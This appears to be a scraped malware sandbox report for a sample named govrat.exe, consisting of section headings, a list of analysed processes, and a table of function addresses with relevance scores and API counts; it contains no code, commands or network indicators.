Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Screenshots

Startup

Created / dropped Files

Contacted Domains/Contacted IPs

Contacted Domains

Contacted IPs

Static File Info

General

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Behavior

System Behavior

Analysis Process: govrat.exe PID: 3676 Parent PID: 3216

General

Chronological Activities

Analysis Process: explorer.exe PID: 3948 Parent PID: 3188

General

Chronological Activities

Analysis Process: explorer.exe PID: 1212 Parent PID: 752

General

Chronological Activities

Analysis Process: ASC.exe PID: 3812 Parent PID: 1212

General

Function 00965B62, Relevance: 128.0, APIs: 13, Strings: 60, Instructions: 209
library

Function 00960762, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 101
library

Function 0095FE2E, Relevance: 9.1, APIs: 6, Instructions: 99
library

Function 009641C3, Relevance: 3.9, APIs: 2, Instructions: 898
libraryCrypto

Function 00965F07, Relevance: 42.1, APIs: 6, Strings: 18, Instructions: 74
library

Function 00965A5F, Relevance: 29.8, APIs: 3, Strings: 14, Instructions: 81
library

Function 00963E83, Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 239
library

Function 00963ED8, Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 218
library

Function 0095355D, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 42
library

Function 0095D775, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 327
registry

Function 009658AB, Relevance: 7.6, APIs: 5, Instructions: 138
library

Function 009613C5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108
windowthread

Function 00961520, Relevance: 6.5, APIs: 5, Instructions: 201
sleep

Function 00961539, Relevance: 6.0, APIs: 4, Instructions: 43
thread

Function 0095D22E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47
library

Function 00961175, Relevance: 4.6, APIs: 3, Instructions: 80
sleep

Function 00961AB7, Relevance: 3.1, APIs: 2, Instructions: 52
thread

Function 0095D4FA, Relevance: 1.6, APIs: 1, Instructions: 147
library

Function 009617BC, Relevance: 1.3, APIs: 1, Instructions: 37
sleep

Function 00958FD6, Relevance: 1.3, APIs: 1, Instructions: 30
sleep